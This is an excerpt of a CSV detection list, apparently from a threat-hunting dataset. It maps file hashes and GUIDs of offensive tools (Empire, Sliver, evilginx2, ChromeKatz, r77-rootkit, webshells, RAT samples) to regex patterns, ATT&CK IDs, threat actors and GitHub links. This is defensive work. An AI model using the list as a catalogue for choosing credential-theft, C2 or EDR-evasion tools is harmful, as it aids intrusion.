"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28879"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28880"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28881"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28882"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28883"
"*7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8*",".{0,1000}7218ab7d2d4dd1e85a6b92afc7cae8e7d3aef7a7add4c5cd8e0ff39ab48b49f8.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28884"
"*7219BFA2-5DA4-4608-A3FC-643B7E87E77A*",".{0,1000}7219BFA2\-5DA4\-4608\-A3FC\-643B7E87E77A.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28886"
"*7223F9B2-17A2-432B-ADAC-51B1E35681DB*",".{0,1000}7223F9B2\-17A2\-432B\-ADAC\-51B1E35681DB.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28887"
"*7227a5e6e3bde7aab29245076b4c216d366ebbc0a116d4c2286c4bfb226fdd38*",".{0,1000}7227a5e6e3bde7aab29245076b4c216d366ebbc0a116d4c2286c4bfb226fdd38.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","28888"
"*722e522f4029a9e0eb3ce298d28949e304b797d242cd4ae8f81e0530ca0acc8f*",".{0,1000}722e522f4029a9e0eb3ce298d28949e304b797d242cd4ae8f81e0530ca0acc8f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","28890"
"*722f4e5abe79cbd2fa8cc52459494082fdbdcffbd629d7e04907b4c1c8575ca9*",".{0,1000}722f4e5abe79cbd2fa8cc52459494082fdbdcffbd629d7e04907b4c1c8575ca9.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28891"
"*72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb*",".{0,1000}72324d0492f79682a741e82343a6535c07a0b2f95fcbf592fc80b242b41abfbb.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","28892"
"*7236273a942e25e236e68c1010b9a4a890bdcba93aa8d41237e70422203e4020*",".{0,1000}7236273a942e25e236e68c1010b9a4a890bdcba93aa8d41237e70422203e4020.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28893"
"*723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac*",".{0,1000}723c4fa580d252cfdafda962e5abb6b45eec8c9aae56497d98983ce6dcf9a1ac.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","28895"
"*723D2DE5B3168EE39FAADD70DCCE691FAE5968D446B8CF47AEA7B29782C02D77*",".{0,1000}723D2DE5B3168EE39FAADD70DCCE691FAE5968D446B8CF47AEA7B29782C02D77.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","28896"
"*723d6f2d441c021b360b85f7f78b85290693cf6abf1376ae93cdac06832edeb2*",".{0,1000}723d6f2d441c021b360b85f7f78b85290693cf6abf1376ae93cdac06832edeb2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","28897"
"*723dfeeb1318c43343f21b49f3ae06a9b3d5e2d4ae5dda61fb57bee39a7b30da*",".{0,1000}723dfeeb1318c43343f21b49f3ae06a9b3d5e2d4ae5dda61fb57bee39a7b30da.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","28898"
"*724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809*",".{0,1000}724f896a9176d6559e7ee09e6c2722665beee437b19869e316988a758b735809.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28899"
"*7261bd93161cfe191e354152d489c3721e41d84a87d6c1af7eaa4dc0c75ab3ff*",".{0,1000}7261bd93161cfe191e354152d489c3721e41d84a87d6c1af7eaa4dc0c75ab3ff.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28902"
"*7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e*",".{0,1000}7267a9321dd7ab890af5892975e257f89b2e53c70216c3708be9b0418e6b470e.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#filehash","N/A","10","8","744","129","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z","28904"
"*726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a*",".{0,1000}726888af98eaa956dd40e486f4fcb93d7e12880f9540d9f28aabda8f90035c1a.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#filehash","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","28905"
"*7270493d60dcc3d13246558e2d6784a4ff5c45d8d6caaa255a3692ea1640c191*",".{0,1000}7270493d60dcc3d13246558e2d6784a4ff5c45d8d6caaa255a3692ea1640c191.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28907"
"*7271AFD1-10F6-4589-95B7-3ABF98E7B2CA*",".{0,1000}7271AFD1\-10F6\-4589\-95B7\-3ABF98E7B2CA.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","28909"
"*727a1d04-70f4-4148-9120-d06510a62a9a*",".{0,1000}727a1d04\-70f4\-4148\-9120\-d06510a62a9a.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#GUIDproject","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","28910"
"*7281b10dd085f5ffe91de5fc1139d1bbf04cc080d542e0a57ae9358eca94f705*",".{0,1000}7281b10dd085f5ffe91de5fc1139d1bbf04cc080d542e0a57ae9358eca94f705.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28914"
"*72882da20b48bcb7248d777f11d7ef439fbcbd153c8c5cd66946317d27597392*",".{0,1000}72882da20b48bcb7248d777f11d7ef439fbcbd153c8c5cd66946317d27597392.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28916"
"*72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede*",".{0,1000}72943e841e721066a5db4d3c3c3e03bfcf3cc275802893e1bd678723e7c82ede.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28917"
"*72946b61b5eb5c362bd560d045eeb9edd267715c2abb443886870ebb5becef31*",".{0,1000}72946b61b5eb5c362bd560d045eeb9edd267715c2abb443886870ebb5becef31.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28918"
"*729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330*",".{0,1000}729ed6976b1710e57fb5e486e1a017b39a437895ae86056c2aa3d45763a6f330.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","28919"
"*72a7649ea0ac981b6bb32dbbe52f3dc76ffc61c10f0e1ed04014ffa8525cc231*",".{0,1000}72a7649ea0ac981b6bb32dbbe52f3dc76ffc61c10f0e1ed04014ffa8525cc231.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28920"
"*72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813*",".{0,1000}72af248c9e2b92add20bde3532f73569fe2c3e941fd12c72f13696f6ccd60813.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28921"
"*72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4*",".{0,1000}72b2d05cbbdea293859fc1a06651a3932c4b72675a0e014ad91a3b413cbd15c4.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","28922"
"*72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a*",".{0,1000}72b675d40bc3c796892caef0581456f9a489e7195527f67ea5b819dac372e89a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","28923"
"*72c3a786661ee9742cf1d0e3b99b89e976911ed87971695f08487cf42d7fc29d*",".{0,1000}72c3a786661ee9742cf1d0e3b99b89e976911ed87971695f08487cf42d7fc29d.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1555 - T1503","TA0006 - TA0007 - TA0009","N/A","Phobos - GoGoogle - 8BASE - Kimsuky - Dispossessor - Loki","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","28927"
"*72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed*",".{0,1000}72ca2211283a4596dbd2881e3cbd8fb8f07420e0b7404bb298eab30873f487ed.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","28928"
"*72cb6dcc8251f18f112f983804a34dc1f651c87614c18ced8a8f0ccf614bca80*",".{0,1000}72cb6dcc8251f18f112f983804a34dc1f651c87614c18ced8a8f0ccf614bca80.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","28930"
"*72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2*",".{0,1000}72ce22f23461dffa813c1a36c37ae081664ee255cbaf0e4b87d5108ab3101df2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28931"
"*72d57c0c42ccd4ec3a220ac3c91cbb49b25cfcabebd30e36539980b52cfd49a4*",".{0,1000}72d57c0c42ccd4ec3a220ac3c91cbb49b25cfcabebd30e36539980b52cfd49a4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","28935"
"*72d6fef7a943dfe5632fca4c573e041367b14f2211770fd7ac4c73955c865dce*",".{0,1000}72d6fef7a943dfe5632fca4c573e041367b14f2211770fd7ac4c73955c865dce.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","28936"
"*72d88f37a4b06a1369b21be40f93b18e929529a0cbffb29b91959582aac23073*",".{0,1000}72d88f37a4b06a1369b21be40f93b18e929529a0cbffb29b91959582aac23073.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","28937"
"*72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c*",".{0,1000}72dcd04c582db154eee02cde9a14312542b86615a88bf47d6529b26f8c87914c.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","28938"
"*72DCE01A-B6EC-4AC3-A98B-D5C44D532626*",".{0,1000}72DCE01A\-B6EC\-4AC3\-A98B\-D5C44D532626.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","28939"
"*72e0ca8ac2312f9bda3badfc199df5bd0a224dcbdfa681a6fda0e3f5a774f7b6 ? ?*",".{0,1000}72e0ca8ac2312f9bda3badfc199df5bd0a224dcbdfa681a6fda0e3f5a774f7b6\s?\s?.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#filehash","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","28941"
"*72e57ac71f5d1bdb6b575ad08a0677bf555fdecdc30469f0b41fcd6d7272c1f5*",".{0,1000}72e57ac71f5d1bdb6b575ad08a0677bf555fdecdc30469f0b41fcd6d7272c1f5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","28942"
"*72e79a2845a4d62e94a059a4f90e1ee1eff06ae329773097e5115a45fbb9a9a1*",".{0,1000}72e79a2845a4d62e94a059a4f90e1ee1eff06ae329773097e5115a45fbb9a9a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28943"
"*72eec1e82c566ff08110a4d06cd5b06cc82c67419131ad52fc537ff5552f69ab*",".{0,1000}72eec1e82c566ff08110a4d06cd5b06cc82c67419131ad52fc537ff5552f69ab.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","28944"
"*72ef1c32661b8307cce495c40dd511c6ff5a55d0c94d82f72224410443172e1f*",".{0,1000}72ef1c32661b8307cce495c40dd511c6ff5a55d0c94d82f72224410443172e1f.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","28945"
